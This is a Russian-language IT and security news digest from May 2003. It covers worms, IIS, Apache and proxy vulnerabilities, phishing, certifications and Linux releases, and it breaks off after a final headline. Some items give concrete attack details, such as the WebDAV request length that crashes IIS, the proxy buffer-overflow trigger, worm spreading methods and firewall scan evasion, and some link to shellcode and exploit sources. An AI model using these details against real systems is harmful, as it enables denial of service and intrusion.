Корпорация ЮНИ, стратегический партнер компании Check Point Software Technologies в России, сообщает о завершении сертификации партии программного обеспечения FireWall-1/VPN-1 версии 5.0 (Check Point Next Generation FP-3) компании Check Point, обеспечивающего комплексную защиту информации. Межсетевой экран Check Point FireWall-1/VPN-1 версии 5.0, Service Pack 3 (Next Generation FP-3) был сертифицирован по 3-му классу защищенности, что подтверждается Сертификатом Государственной Технической Комиссии при Президенте РФ. Сертификат № 754 от 15 мая 2003 года свидетельствует, что Check Point FireWall1/VPN-1 версии 5.0 является программным средством защиты от несанкционированного доступа к информации и соответствует требованиям Руководящего документа Гостехкомисии России "Средства вычислительной техники. Межсетевые экраны. Защита от несанкционированного доступа к информации. Показатели защищенности от несанкционированного доступа к информации". Документ выдан на основании результатов успешно проведенных сертификационных испытаний и экспертного заключения Гостехкомиссии России. Источник - http://www.uni.ru/
31/05/2003 12:58 ЛАНИТ получил лицензии на деятельность в сфере защиты информации.
Государственная техническая комиссия при президенте РФ выдала холдингу ЛАНИТ, занимающему 5 место в рейтинге CNews100 (по итогам 2002 года), лицензии на деятельность в сфере защиты информации. Лицензия № 76 предоставляет право осуществлять мероприятия и оказывать услуги по технической защите конфиденциальной информации. Лицензия № 49 разрешает разрабатывать и производить средства защиты конфиденциальной информации. Обе лицензии действуют в течение пяти лет — до мая 2008 года. Вновь полученные лицензии Гостехкомиссии - далеко не первые в ряду других официальных документов, на основании которых ЛАНИТ работает в области информационной безопасности. Холдинг обладает еще четырьмя лицензиями на деятельность по проектированию, производству, распространению и обслуживанию криптографических средств (шифрования и электронной цифровой подписи). Федеральная служба безопасности РФ предоставила компании право проводить работы, связанные с использованием сведений, составляющих государственную тайну; еще одна лицензия Гостехкомиссии, выданная в 2001 г. и продолжающая действовать, разрешает разрабатывать, производить, реализовывать, устанавливать и обслуживать технические средства защиты информации. Источник - http://www.cnews.ru
31/05/2003 11:56 Вирусописатели мечтают, чтоб Буш полюбил Хусейна.
Появился новый червь "Maddas", который представляет из себя файл конфигурации интерфейса рабочего стола Windows. Файл "BushLovesSaddam.theme" содержит в себе скрипт вируса на языке Visual Basic Script. При открытии этого файла и попытке просмотреть скринсейвер данной конфигурации интерфейса "Maddas" копирует себя под именем "recycled.bat" в корневой каталог диска C и запускает этот файл. Червь создает файл "kernel.vbs" в каталоге Windows. Данный файл осуществляет функцию размножения червя по электронной почте. "Maddas" запускает MS Outlook и рассылает себя по всем адресам из адресной книги. Подробности - http://www.viruslist.com/index.html?tnews=1001&id=2365015
31/05/2003 10:39 Apple iTunes: недолго музыка играла.
Под давлением звукозаписывающих компаний, Apple пришлось убрать из своей программы iTunes возможность транслировать (так называемая функция "Рандеву") через интернет скопированные с CD музыкальные композиции. Представители Apple отмечают, что расстроены тем, как их клиенты использовали функцию "Рандеву" для трансляции музыки посредством интернета совершенно незнакомым людям. По их словам, функция "Рандеву" предназначалась для прослушивания музыки внутри домашней сети или в небольшой группе знакомых людей. Позиция, отметим, весьма странная. Если ты с кем-то знаком, то ты имеешь право дать ему послушать имеющуюся у тебя музыку. А вот если человек тебе совершенно чужой, то права слышать купленную тобой музыку у него уже нет? Судя по отсутствию какой-либо логики в этом заявлении Apple, над нею в воздухе висит призрачный, но тяжелый кулак RIAA. Хоть обновление iTunes и не носит обязательного характера, однако будет предлагаться к скачке с сервера Apple ежедневно до тех пор, пока оно не будет установлено. Источник - http://www.reuters.com/home.jhtml
30/05/2003 21:17 Вышел rmap-15j
После долгого затишья, Rik van Riel сообщил в рассылке lkml о выходе очередной версии своего патча, реализуещего механизм реверсивного маппинга для ядра 2.4. Сам механизм подробно описал тут. На этот раз один из ведущих разработчиков VM подсистемы ядра Linux внес следующие изменения:- улучшено выделение памяти для больших блоков страниц
- усовершенствован OOM killer
- ускорена выборка inode для машин с большим объемом ОП
и множество других обновлений Источник - рассылка LKML Скачать - http://surriel.com/patches/2.4/2.4.21-pre7-rmap15j
30/05/2003 20:10 Так что же - Linux или Solaris?
Сравнительный анализ популярных ОС опубликован сегодня на www.newsfactor.com Ознакомиться - http://www.newsfactor.com/perl/story/21637.html
30/05/2003 20:09 В Азии кончаются IP-адреса
Забыв об исторических разногласиях, правительства и ученые трех стран объединяют усилия, чтобы предотвратить общую катастрофу. Проблема в том, что имеющийся в распоряжении этих стран запас IP (Internet Protocol)-адресов быстро близится к исчерпанию. Без этих 32-битных кодов 3G-телефоны, ПК и карманные устройства теряют свое лицо и не могут передавать или принимать данные. Через пару лет адреса закончатся и остановятся колеса онлайнового мира — а может быть, и всей экономики трех североазиатских государств. Положение Азии усугубляется тем, что по действующей сейчас схеме IPv4 (IP версии 4), начертанной 20 лет назад, этому региону адресов выделено меньше всего. Рени Гэмбл, менеджер программы аналитической фирмы IDC и специалист по вопросам IP и широкополосного доступа, приводит несколько занимательных цифр. Китаю с населением 1,3 млрд человек в IPv4 выделено всего 22 млн IP-адресов. В прошлом году там было 17 млн пользователей Интернета, а к 2007 году их число достигнет 62,5 млн. Япония и Корея тоже скоро исчерпают свои адреса, предупреждает она. Причем в этих расчетах не учитывается грядущая волна 3G-телефонов и интеллектуальных домашних устройств, которым тоже потребуются адреса. США и Европа пока чувствуют себя спокойно, так эти регионы захватили большую часть IP-адресов. Американцам, например, принадлежит 70% всех существующих IP-адресов. Детальней - http://news.battery.ru/theme/science/
30/05/2003 09:44 Белорусcкая милиция арестовала 2-х взломщиков.
Сотрудникам минской милиции удалось установить личности двух взломщиков компьютерных систем банковских учреждений США. По информации, которую распространило белорусское МВД, ими оказались двое жителей Минска, одному из которых 19, другому - 18 лет. Из американских банков они "похитили сведения, составляющие коммерческую тайну, с целью их разглашения". По данному факту возбуждено уголовное дело. Пока злоумышленники отпущены под подписку о невыезде. По белорусскому законодательству, за такого рода преступления им грозит наказание в виде лишения свободы на срок до двух лет. Источник - http://www.securitylab.ru
29/05/2003 18:30 SQL инъекция и Oracle, часть 2.
На сайте securitylab.ru опубликована вторая часть перевода статьи под названием "SQL инъекция и Oracle, часть 2", выполненнного Михаилом Разумовым. Это вторая часть из серии статей, исследующих атаки SQL инъекции против баз данных Oracle. Первая статья содержала обзор SQL инъекции и того, как приложения базы данных Oracle уязвимы к этой атаке, также были рассмотрены несколько примеров. Эта часть сосредоточится на определении привилегий, обнаружении атак SQL инъекции, и защите против SQL инъекции. Статья - http://www.securitylab.ru/?ID=38037
29/05/2003 15:20 Выход Apache 2.0.46.
Apache Software Foundation cообщает о выпуске версии 2.0.46 популярного Вэб-сервера Apache. Новая версия отличается от старой в основном исправленными багами и исправлениями в части безопасности. В части безопасности - исправлены 2 потенциальные уязвимости. Первая - возможность завала сервера через web_dav и (возможно) другие компоненты. Была сообщена группе разработчиков David Endler из iDefence. Вторая связана с модулем аутентификации в UNIX-cистемах в функции apr_password_validate(). Подробности - http://www.apache.org/dist/httpd/Announcement2.html
29/05/2003 12:32 Об уязвимости в IIS.
Возвращаясь к предыдущей новости, хотелось бы конкретизировать некоторые детали уязвимости в IIS (Вэб-сервере от Micro$oft). Уязвимость обнаружена и опубликована в BUGTRAQ группой специалистов по безопасности Web-технологий SPI Dynamics из Атланты (США). Заключается она в том, что при посылке при посылке запроса к WebDAV c использованием методов 'PROPFIND' или 'SEARCH', и при этом длина этого запроса превышает 49,153 байт - ISS благополучно перестартовывает. При этом, все активные Вэб-, FTP-, SMTP- сессии прерываются и становятся невозможными до момента полной перезагрузки IIS-сервера. Как было сказано ниже - патч от M$ MS03-18 выпущен. Подробности - http://www.spidynamics.com/iis_alert.html
29/05/2003 10:58 Новые уязвимости в продуктах Microsoft.
Корпорация Microsoft выпустила два новых бюллетеня, посвященных проблемам безопасности своих продуктов. В бюллетене MS03-018 описываются несколько дыр в службе Microsoft Internet Information Services (ISS) версий от 4.0 до 5.1 включительно. Шестая версия ISS уязвимостей не содержит. В зависимости от своего характера, дыры в ISS получили рейтинг от малоопасного (low) до важного (important). Одна из дыр в ISS связана с технологией CSS и позволяет осуществлять манипуляции с зонами безопасности на клиентской машине. Уязвимость, связанная с переполнением буфера в IIS 5.0 более серьезная - она позволяет злоумышленнику выполнить на сервере произвольный код. Кроме того, еще две уязвимости могут использоваться для организации DoS-атак. В первом случае уязвимость связана с неправильным выделенеим памяти при работе с ASP-страницами, а вторая - с неправильной обработкой ошибок запросов WebDAV. Для устранения всех этих дыр выпущен кумулятивный патч. Еще одна дыра умеренной опасности была обнаружена в службе Microsoft Windows Media Services, входящей в состав ОС Windows 2000, а точнее в ISAPI-расширении для нее. Данная служба предназначена для организации потоковых трансляций через интернет. В реализации службы имеется ошибка, в результате которой некоторые из запросов обрабатываются неправильно. Направив особым образом сформированный запрос, злоумышленник сможет заставить сервер перестать обрабатывать остальные запросы. Описание уязвимости и методов ее устранения можно найти в бюллетене MS03-019. Подрообности - http://www.compulenta.ru/2003/5/29/39738/
29/05/2003 10:24 Бракованный патч к Windows XP отключал интернет.
Корпорация Microsoft отозвала выпущенный 21 мая патч для операционной системы Windows XP, который содержал ряд обновлений для встроенного в данную ОС брандмауэра. Причиной для отзыва обновления стали конфликты с персональными брандмауэрами от сторонних производителей. Из-за этого конфликта на некоторых компьютерах доступ в интернет полностью блокировался. С такой проблемой столкнулись около 600 тысяч пользователей Windows XP. Решить проблему можно, деинсталлировав патч. В ближайшее время Microsoft обещает выпустить исправленную версию обновления. Подробности - http://story.news.yahoo.com/news?tmpl=story...
28/05/2003 14:23 NetBIOS, WINS и Browsing lists.
Довольно интересная статейка Максима Берлина обнаружена на информационном сервере МИТХТ (обнаружена благодаря письму от автора статьи, собственно). Рассказывается, что такое NetBIOS, что собой представляют имена компьютеров в NetBIOS-сети, каким образом они формируются. Разбирается технолгия работы WINS, работа различных броузеров (master browser(domain\0x1d), backup browser, potential browser и preferred master browser). Очень интересная статья. Вполне может рекомендоваться тем, кто пробует разобраться в хитросплетениях нагороженного M$ сетевого огорода (одно широковещания при определении NetBIOS-имён чего стоит). Пользуясь случаем, хотелось бы поблагодарить автора за интересный материал, ссылку на который он прислал по почте. Статья - http://info.mitht.rssi.ru:8101/wins/
28/05/2003 14:02 Уязвимость в Analogx Proxy.
K. K. Mookhey из Индии сообщает об обнаружении уязвимости в Analogx Proxy - маленьком приложении, позволяющем организовать на сервере под управлением Win-ОС прокси-сервер, поддерживающий протоколы - HTTP, FTP, SMTP, POP3, HTTPS, NNTP, SOCKS. Было обнаружено, что при задании URL длиной более 340 символов происходит переполнение буфера с возможным затем DoS и, в некоторых случаях, возможным выполнением произвольного кода от имени пользователя, от которого запущено приложение - обычно Administrator. Так как по умолчанию Analogx Proxy слушает оба сетевых интерфейса атака может быть проведена и из Интернет - на порт 6588/TCP. Уязвимости подвержены версии до 4.13 включительно. Рекомендуется обновиться на новую версию - 4.14. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0295.html
28/05/2003 13:01 Уязвимость в Privatefirewall.
Павел П. aka UkR-XblP из UkR Team обнаружил уязвимость в коммерческом персоннал файрволле Privatefirewall 3.0. Privatefirewall помимо функций файрволла обладает функциями интегрированной системы опредления попыток вторжения (IDS). Privatefirewall мониторит траффик, входящий и выходящий из защищаемой машины. При этом уровень мониторинга (действуия, выполняемые над поступающими и исходящими пакетами) определяется установками пользователя - Allow, Filter и Deny. Было обнаружено, что в режиме Filter не в состоянии определить FIN- и XMAS tree-типы сканирования (в первом случае сканирование осуществляется с установленным флагом FIN cегмента TCP, во втором - со всеми установленными флагами - SYN, FIN, RST, ACK - эти типы сканирования могут быть заданы при помощи, например, сканера NMAP). В случае же Deny Internet Traffic, который, по идее, должен блокировать полностью весь траффик (как входящий, так и выходящий) всё равно у атакующего остаётся возможность провести как FIN, так и XMAS tree-сканирование. Подробности - http://ust.icqinfo.ru/index/advisories/privatefirewall18
28/05/2003 12:22 Написание шелл-кода в OC Linux.
Довольно любопытная и, наверняка, небезынтересная для многих статья под названием "Writing generic SHELLCODE for Linux". Шеллкод (Shellcode) обычно используется эксплоитами для получения оболочки суперпользователя после взлома системы. Статья - http://www.hack.co.za/download.php?file=593
28/05/2003 11:57 Новые попытки почтового мошенничества.
По данным, опубликованным в статье eWeek, наблюдается значительный рост числа попыток сканирования электронной почты пользователей систем Internet-банк с целью получения конфиденциальной информации, такой как пароли и имена пользователей. Последними жертвами такого рода мошенничества стали клиенты c2it, глобального сервиса электронных платежей Citibank. Подложное сообщение отправляется от имени службы по работе с клиентами c2it, хотя на самом деле оно приходит с адреса на сервере Hotmail. В качестве темы сообщения указывается "Your account is on hold." ("Ваш счет заблокирован"), а в тексте содержится просьба заполнить HTML форму, содержащую данные, якобы требующиеся для обеспечения безопасности. Естественно, клиентов просят указать свои имена, пароли и номера кредитных карт. Но кроме этого, их также просят предоставить иные детали, которые могут быть использованы для идентификации, включая номер страхового свидетельства и девичью фамилию матери. Среди прочих мошенничеств, обнаруженных на этой неделе, можно выделить попытки обмана пользователей eBay и PayPal, а также клиентов испанской системы Internet-банк BBVAnet. Источник - http://www.crime-research.org
28/05/2003 11:34 SAP выбирает MySQL.
Немецкая компания SAP AG, являющаяся одним из мировых лидеров в области программного обеспечения для бизнеса, объявила о заключении партнерского соглашения с разработчиками открытой СУБД MySQL. MySQL является самой популярной СУБД с открытым исходным кодом. Число ее установок по всему миру превышает 4 миллиона. Каждый день с сайта разработчиков загружаются около 30000 копий этой СУБД. В рамках нового соглашения SAP планирует постепенно отказаться от собственного продукта SAP DB в пользу MySQL. В SAP особо подчеркивают, что для существующих пользователей SAP DB ничего не изменится. Компания продолжит предоставлять им техническую поддержку и необходимые обновления. Единственным отличием станет то, что в качестве торговой марки SAP будет использовать именно MySQL. Соглашение между SAP и MySQL является многолетним, и в будущем компании намерены объединить усилия для создания нового поколения СУБД. При этом создание кода и управление проектом ляжет на плечи MySQL, тогда как задачи по внедрению системы и технической поддержке пользователей будут решать обе компании совместными усилиями. Реализация данных идей потребует времени, и до окончания предварительного этапа сотрудничества все задачи, связанные с поддержкой SAP DB, будет решать компания SAP, используя при этом марку MySQL. В качестве причины перехода на MySQL в SAP называют желание компании как можно полнее соответствовать запросам клиентов. Использование одного из наиболее популярных продуктов с открытым кодом является вполне логичным шагом на этом пути. Источник - http://compulenta.ru/2003/5/27/39654/
28/05/2003 11:05 Longhorn будет модульной.
Microsoft работает над тем, чтобы ее вездесущая операционная система Windows упростила и удешевила разработку и распространение ПО. Следующая версия клиентской ОС Windows с кодовым названием Longhorn будет представлять собой серию компонентов, которые Microsoft сможет легко комбинировать и модифицировать для разных рынков и разной аппаратуры. Это отход от давней стратегии компании, которая до сих пор создавала несколько подобных, но все же разных операционных систем, нацеленных на определенные задачи и географические регионы. Это изменение упростит процесс разработки и, следовательно, уменьшит стоимость Windows-ПК и выпуска поправок к программам, утверждает менеджер Microsoft по работе с ОЕМ-производителями Марк Майерс. Ожидается, что Longhorn дебютирует в 2005 году и займет место Windows XP. У этой системы будет лучшая поддержка графики, новая система хранения данных и новый внешний вид. Microsoft намерена выпустить одну версию этой ОС для производителей ПК и для розничной продажи. Сейчас CD с Windows, которые продаются в коробках, несколько отличаются от тех, что устанавливаются на новые ПК. Наличие двух версий отвлекает много времени и ресурсов Microsoft, пояснил Майерс, выступая в прошлом месяце на конференции, спонсируемой компанией. Около 95% ключевых функций Longhorn все же будут сосредоточены в ядре операционной системы. Например, чтобы экспортировать ПК Longhorn во Францию, производители будут добавлять к ядру модуль французского языка посредством новой подсистемы ОС Multi-Lingual User Interface (MUI). Подробности - http://zdnet.com.com/2100-1104_2-1010051.html
28/05/2003 10:28 Вышел Adobe Acrobat 6.0.
Компания Adobe Systems Incorporated представила исправленную и существенно дополненную версию Adobe Acrobat, программы для работы с документами в формате PDF (Portable Document Format - собственная разработка фирмы Adobe, на сегодняшний день этот формат довольно распространён). Adobe Acrobat 6.0 представлен в трёх вариантах - Acrobat 6.0 Professional, Acrobat 6.0 Standard и Acrobat Elements. Все три версии поддерживает работу с XML. Первый продукт - наиболее полный, он предназначен для подготовленных профессиональных пользователей, которые работают с документами сложной структуры, насыщенными графикой. Adobe Acrobat Elements ориентирован исключительно на корпоративное использование; стоимость одного рабочего места Elements значительно ниже, чем при покупке любого из двух других вариантов продукта. Adobe Acrobat 6.0 работает с операционными системами Windows 98SE (только Acrobat 6.0 Standard и Acrobat Elements), Windows 2000 Professional (с установленным service pack 2), Windows NT Workstation 4.0 (с установленным service pack 6), Windows XP Home/Professional/Tablet PC Edition, а также Mac OS X 10.2.2 (только Acrobat 6.0 Professional и Acrobat 6.0 Standard). Пока у продукта есть только англоязычный интерфейс. В первой неделе июня планируется выпустить французскую и немецкую версии, а в начале июля - японскую версию ПО. Помимо Acrobat 6.0, компания Adobe выпустила новую версию бесплатно распространяемой программы Acrobat Reader, предназначенной для просмотра и печати документов формата PDF. Источник - http://www.compulenta.ru
28/05/2003 10:02 Mozilla пытаются переписать на Java.
Участники проекта Jazilla завершили работу над первой рабочей версией браузера, написанного целиком на Java. Целью проекта является создание клона Mozilla. Работа над проектом началась достаточно давно, но в 2000 году он был заморожен. Разработка Jazilla возобновилась лишь в августе 2002 г. Тем не менее, работа у новой команды пошла достаточно быстро, и сейчас браузер достиг стадии альфа-версии. До настоящей Mozilla ей, впрочем, пока далеко. Тем не менее, Jazilla работает и удовлетворительно отображает многие сайты. Первая доступная публично версия браузера называется Jazilla Milestone. Поскольку браузер целиком и полностью написан на Java, он является платформонезависимым. В Jazilla Milestone реализована поддержка языка создания интерфейсов XUL, для рендеринга страниц используется система NetBrowser. Браузер распространяется в соответствии с лицензией Mozilla Public License 1.0 (MPL) и предназначен как для разработчиков, так и для конечных пользоватлей. Подробнее - http://sourceforge.net/projects/jazilla
28/05/2003 09:21 Новый червь "Nocana" спекулирует на популярности "Матрицы".
В "Лаборатории Касперского" поймали и описали нового червя, однако, пока никто им не заболел. Что радует. Новичок "Nocana", также известный как "Naco", распространяется обычным для червей способом - через интернет в виде файлов, прикрепленных к зараженным письмам. Кроме того, он ползет и по P2P-сетям обмена файлами. В копии червя могут стоять имена: The Matrix Reloaded.jpg.exe, The Matrix Evolution.mpg.exe, The Matrix Reloaded Preview.jpg.exe. "Nocana" cодержит бэкдор-процедуру, является приложением Windows (PE EXE-файл) и написан на Visual Basic. Он "родственник" червя "I-Worm.Melare". Известно несколько версий "Nocana", которые незначительно отличаются друг от друга. "Nocana.a" : около 29K (упакован UPX, размер распакованного файла - около 80K); "Nocana.b" - около 86K; "Nocana.c" - около 32K (упакован UPX, размер распакованного файла - около 100K). Нужно иметь в виду, что реальное .EXE-имя файла во вложении скрыто "ложным" .JPG-именем при помощи дополнительных возможностей MS Outlook. Таким образом зараженное EXE-вложение в письме выглядит как .JPG-файл, однако, при открытии этого вложения оно обрабатывается как EXE-файл. Вложения подобного рода автоматически блокируются по умолчанию версиями MS Outlook 97 SP2 и выше. "Nocana" останавливает и выгружает активные процессы некоторых антивирусов и файрволов. Червь записывает свои копии в каталоги обмена файлами сетей KMD, Kazaa, Morpheus, Grokster, BearShare, Edonkey2000, Limewire. Более подробно - http://www.viruslist.com/index.html?tnews=1001&id=2349067
27/05/2003 14:45 Способы пассивного анализа сетевого трафика.
На сайте SecurityFocus опубликована статья Kevin Timm "Passive Network Traffic Analysis: Understanding a Network Through Passive Monitoring". В статье рассмотрены различные инструменты, при помощи которых можно осуществлять пассивный мониторинг сети. Статья - http://www.securityfocus.com/infocus/1696
27/05/2003 14:13 ПО предотвращает кражу ПК.
Две компании объединили усилия, чтобы предложить основанную на BIOS технологию защиты компьютера, которая блокирует украденный ПК или ноутбук при первом же подключении его к интернету. Если софтверные компании Phoenix Technologies и Softex преуспеют в своем начинании, кража ПК станет гораздо менее выгодным занятием. Они разрабатывают программу TheftGuard, которая встраивается в ПК на низком уровне и автоматически блокирует любую украденную машину, как только та подключится к интернету. Кроме того, TheftGuard поможет жертве разыскать злоумышленника, выходящего через краденую машину в онлайн. «Вы узнаете, как он выходит в интернет, через своего сервис-провайдера, после чего сможете обратиться в полицию», — говорит старший вице-президент и генеральный менеджер Phoenix Тимоти Идес. Программа TheftGuard, созданная компанией Softex, работает независимо от операционной системы. Она устанавливается на ПО Phoenix Core Managed Environment, которое размещается во внутренней аппаратуре компьютера и частично на жестком диске. Технология основана на ПО FirstBIOS компании. Каждый раз, когда компьютер, оборудованный TheftGuard, подключается к интернету, он обращается к сайту TheftGuard. Жертва кражи предварительно регистрирует свою машину на этом сайте, и, если украденный компьютер объявится в онлайне, ее прежний владелец может вывести ее из строя и стереть данные, а также определить используемый злоумышленником IP-адрес. Подробнее - http://www.zdnet.ru/?ID=301372
27/05/2003 14:00 Полиция Италии не может вскрыть КПК террористов.
Итальянская полиция столкнулась с неожиданной проблемой, связанной с шифрованием данных. В руки карабинеров попали, по меньшей мере, два КПК Psion, принадлежавших террористам из ультралевой организации "Красные бригады", но все надежды получить из них ценную информацию пошли прахом. Революционеры использовали PGP-шифрование и никакие попытки считать данные ни к чему не привели. КПК достались полиции в результате перестрелки 2 марта в поезде Рим-Флоренция. Они принадлежали "краснобригадовцам" Наде Дездемоне Льоче и Марио Галези. Последний был убит карабинерами, которые тоже потеряли одного своего товарища. Источники сообщают о двух или трёх КПК, из которых, по меньшей мере, один содержал зашифрованные данные. Его отправили в лабораторию штаб-квартиры ФБР в американском штате Вирджиния. Официальные лица ФБР отказываются комментировать процесс расследования, то же делают и итальянские власти. О том, что данные были защищены с помощью PGP, сообщила ежедневная римская газета La Repubblica, добавив, что попытки вскрыть защиту оказались бесплодны. Автор системы PGP Фил Циммерман заявил, что его детище функционирует только на КПК, работающих под управлением PalmOS или Windows CE. Пресс-секретарь Psion сообщил, что PGP может работать и с Epoc, собственной ОС Psion, но для этого требуется ПО стороннего производителя. Подробности - http://www.compulenta.ru/2003/5/27/39637/
27/05/2003 10:16 UNIX's True Competition
Новая статья на osnews.com описывающая текущую ситуацию на рынке UNIX-like систем, причины успеха linux и многое другое. Ознакомиться - http://www.osnews.com/story.php?news_id=3649
27/05/2003 10:12 Linux 2.5.70
Очередной релиз в нестабильной ветви. На этот раз- множественные обновления в коде USB
- фикс в open() при использовании флага O_DIRECT
- исправления в механизме кеширования объектов ядра
- обновления в ext2/ext3
и многое другое. Полный Changelog - http://linuxtoday.com/developer/2003052700126NWKNDV
26/05/2003 13:22 Статья "Шифрование с использованием библиотек OpenSSL".
Russian Linux Gazette опубликовала очередной перевод - статью "Шифрование с использованием библиотек OpenSSL". Автор оригинальной статьи - Vinayak Hegde, перевод - Игорь Яровинский. Одной из главных потребностей современного информационного общества является защита используемой информации. Шифрование дает возможность не допустить утечку и попадание важных данных в руки злоумышленника. Библиотеки OpenSSL используются для решения этой проблемы. Но, увы, многие алгоритмы, позволяющие кодировать информацию, недостаточно документированы. Можно читать исходные коды и следить за тем, что происходит при выполнении этих программ. Этому помогают имена функций, которые на интуитивном уровне дают понять, что именно делает та или иная подпрограмма. Кроме этого, можно внести свой адрес в список рассылок на сайте OpenSSL и следить за новостями проекта таким образом. Вот описанию разработки программ с использованием библиотеки шифрования OpenSSL и посвящена статья. Статья - http://gazette.linux.ru.net/lg87/vinayak.html
26/05/2003 13:08 Slackware отказывается от i386.
Минимальные системные требования дистрибутива были подняты до "80486 и выше". Из-за особенностей разделяемых библиотек C++ в gcc 3.2.x, а также необходимости обратной совместимости со Slackware 9.0, авторы Slackware Linux были вынуждены отказаться от поддержки процессоров 80386. Это не должно как-либо сказаться на пользователях дистрибутива, поскольку, по результатам он-лайн опроса, на таком оборудовании обычно используются лишь старые версии Slackware. В любом случае, владельцу "трешки" для установки Slackware 9.1 просто не хватит места на жестком диске. Подробности - http://www.slackware.com/changelog/current.php?cpu=i386
26/05/2003 13:03 Новый программный пакет в два счета вернет ноутбук к жизни.
Сбои в работе ОС от Microsoft стали обычным явлением для каждого пользователя ПК. Тем не менее, решением проблем "глючности" операционных систем софтверного гиганта занимается кто угодно, кроме него самого. Очередным спасителем "глючных" ОС стала компания Phoenix, которая до этого была известна своими... системами BIOS. Ею был разработан программный пакет FirstWareRecover Pro, который позволяет легко вернуть портативный ПК к нормальной работе после сбоя. При инсталляции FirstWareRecover Pro в защищенную область жесткого диска помещается вся жизненно важная информация о настройках компьютера, сообщает The Inquirer. При сбое в работе или иной форс-мажорной ситуации пользователю будет достаточно лишь нажать на соответствующую кнопку на экране Windows. После этого система "откатится" в состояние, в котором она находилась до сбоя, - никаких обращений в службу технической поддержки. Источник - http://www.webplanet.ru
26/05/2003 12:31 Планы США по безопасности угрожают свободе Евросоюза.
Планы США по внедрению системы глобального электронного наблюдения в целях предупреждения кибертерроризма могут ущемить права и свободы жителей Евросоюза. Об этом сообщили агентству Reuters в Комитете по охране частных прав и свобод ЕС. С целью предотвратить в будущем террористические атаки, подобные атаке на Всемирный торговый центр, в недрах министерства по безопасности США готовиться проект Terrorist Information Awareness, в рамках которого американцы смогут получить неограниченный доступ к миллиардам баз данных, касающейся частной информации. Стефанио Родота, председатель национального комитета по защите частной информации выступил с призывом к главам Евросоюза обязательно рассмотреть эту проблему на предстоящем саммите Евросоюз – США, который должен состояться в июне. «Мы ничего не имеет против планов США по обеспечению их национальной безопасности, однако в этом случае, попытки навязать «Большого брата» Евросоюзу кажутся чрезмерными и противоречат нормам ЕС по обеспечению приватности и конфиденциальности частной информации», - рассказал в интервью Reuters Стефанио Родота. Во вторник Пентагон выступил с заявлением, где сообщил о готовности запустить программу, которая призвана стать гарантом безопасности гражданских свобод житлей США. Программа, на создание которой по оценкам специалистов США выделила около $54 млн. вызывает спорные вопросы среди юристов Евросоюза, поскольку пока не известно, будет ли ее действие распространяться только на территории США или за ее пределами. Подробности - http://www.internet.ru/mainnews/n_6h62.esp
26/05/2003 12:04 Конгрессмены развернули борьбу со спамом на государственном уровне.
В субботу в Палату представителей на рассмотрение был внесен законопроект о борьбе с несанкционированной рекламой в Интернете (спамом), сообщает Reuters. Законопроект, инициатором которого выступил конгрессмен от Северной Каролины Ричард Берр, является результатом многомесячных переговоров между членами Республиканской партии. Проект "Закона о снижении распространения спама" предусматривает крупные штрафы для участников интернет-рынка в случае предоставления недостоверных идентификационных данных или совершении каких-либо других обманных действий. В то же время новый акт не препятствует обмену бизнес-информацией по электронной почте. К инициативе Берра присоединились также главы комитетов по вопросам судоустройства и энергитики и торговли, что по мнению Reuters, гарантированно создаст законопроекту ряд препятствий прежде, чем он будет принят. Председатель комитета Палаты представителей по судоустройству полагает, что к концу июня антиспамерский закон все же будет принят. Подробности - http://www.nzherald.co.nz/business/businessstorydisplay.cfm?storyID=3503846...
26/05/2003 11:50 Эксплоит уязвимости, позволяющей получать информацию из Eternet-фреймов.
Господин Michael Komm из Чехии опубликовал эксплоит - программу на Си, позволяющую отлавливать информацию в Ethernet-фреймах. Уязвимость была ранее обнаружена atStake и носила название Ethernet frame padding information leakage, что можно перевести, как утечка информации в заполнении Ethernet-фреймов. Суть её сводилась к тому, что посылая пакеты к машине и анализируя ответы (например, попросту пингуя) можно по содержимому фреймов получать важную системную информацию. Для более подробного описания - см. PDF-документ - http://www.atstake.com/research/advisories/ 2003/atstake_etherleak_report.pdf. Для реализации атаки, которая применяется програмой необходимо (естественно) чтобы обе машины находились в одном физическом сегменте сети и наличие прав root на атакующей машине (поскольку идёт работа с "сырыми" сокетами). Исходник - http://packetstorm.linuxsecurity.com/sniffers/ethersniff.c
26/05/2003 10:51 сПам? Заблокировать.
После обновления #915, выпущенного компанией Trend Micro для продукта Cupertino, представляющего собой решение для блокировки спама и прочего нежелательного контента на входе в корпоративную сеть, Cupertino стал замечательнейшим образом блокировать все электронные письма, в заголовке или тексте которых содержалась латинская буква "P". Надо отдать должное расторопности службы поддержки Trend Micro: потребовалось около полутора часов и пара десятков жалоб от клиентов, чтобы апдейт #915 сменился апдейтом #916, в котором проблема была устранена. Будьте внимательны. Источник - http://www.viruslist.com/
26/05/2003 10:28 Гид по выбору Linux-дистрибутива для новичка.
Как сообщает SHuRuP c nixp.ru, опубликован обзор десятка самых популярных на сегодняшний день Linux-дистрибутивов: Lycoris, Xandros, Lindows, Gentoo, Debian, Slackware, Mandrake, Red Hat, SuSE, Knoppix. Данная статья должна стать полезным пособием для новичков, не знающих, какой из многочисленных Linux'ов им выбрать для знакомства с операционной системой. Обзор носит название "A Beginner's Guide to Choosing a Linux Distribution". Подробности - http://distrowatch.com/dwres.php?resource=major
26/05/2003 10:04 Sun вступила в глобальный союз с Red Hat.
Sun Microsystems и Red Hat вступили в союз, с целью совместно выпускать ОС Red Hat Linux и расширять использование технологий друг друга на рынке серверов. По соглашению, Red Hat будет выпускать Java Virtual Machine от Sun Microsystems вместе с копиями Red Hat Enterprise Linux. Sun будет поддерживать все версии Red Hat Enterprise Linux для процессоров х86, а также для него (RHEL) станет доступным продукт Sun ONE. Новость получена от fly4life с nixp.ru. Подробности - http://www.sun.com/smi/Press/sunflash/2003-05/sunflash.20030519.4.html
25/05/2003 15:37 Спама станет больше, чем нормальных писем.
